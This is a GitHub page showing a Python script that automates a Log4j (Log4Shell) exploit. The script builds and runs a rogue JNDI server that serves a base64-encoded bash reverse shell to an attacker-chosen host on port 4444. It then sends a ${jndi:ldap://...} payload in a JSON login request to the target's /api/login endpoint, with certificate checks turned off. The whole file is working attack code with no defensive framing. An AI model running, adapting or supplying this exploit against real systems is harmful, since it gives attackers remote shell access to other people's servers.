-
Notifications
You must be signed in to change notification settings - Fork 1
/
log4j_reverse_shell.py
60 lines (48 loc) · 2.33 KB
/
log4j_reverse_shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import requests
import base64
import subprocess
import argparse
import multiprocessing
import time
parser = argparse.ArgumentParser(description="Requirements: Java and Maven installed")
parser.add_argument("--host", help="The IP which is hosting the rogue jndi server")
parser.add_argument("--target", help="The IP of the target server")
parser.add_argument("--port", help="The port of the target server running the service")
args = parser.parse_args()
# Disabling the no HTTPS certificate warning, remove if needed
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def git(*args):
return subprocess.call(['git'] + list(args))
def setupserver():
directory_contents = subprocess.run("ls", stdout=subprocess.PIPE, text=True).stdout.split('\n')
if ('rogue-jndi' not in directory_contents):
git("clone", "https://github.com/veracode-research/rogue-jndi")
subprocess.check_call("mvn -f rogue-jndi package".split(' '))
else:
print('rogue-jndi ALREADY INSTALLED')
command = str(base64.b64encode(b'bash -c "bash -i >& /dev/tcp/'+bytes(args.host, 'utf-8')+b'/4444 0>&1"'), 'utf-8')
print('Starting server ...')
commands = ['java','-jar','rogue-jndi/target/RogueJndi-1.1.jar','--command','"bash -c {echo,'+command+'}|{base64,-d}|{bash,-i}"','--hostname',args.host]
print('------------------')
print(commands)
print('------------------')
subprocess.check_call(commands)
#subprocess.check_call(commands,stdout=subprocess.DEVNULL,stderr=subprocess.STDOUT)
def runexploit():
headers = {
'Host': f'{args.target}:{args.port}',
'Origin': f'https://{args.target}:{args.port}',
#'Content-Length': '104',
'Content-Type': 'application/json',
}
payload = '${jndi:ldap://'+ args.host +':1389/o=tomcat}'
data = '{"username":"a","password":"a","remember":"'+payload+'","strict":true}'
print('Making the request...')
response = requests.post(f'https://{args.target}:{args.port}/api/login', headers=headers, data=data, verify=False)
print('Response:',response.content)
if __name__=='__main__':
process1 = multiprocessing.Process(target=setupserver)
process2 = multiprocessing.Process(target=runexploit)
process1.start()
time.sleep(5)
process2.start()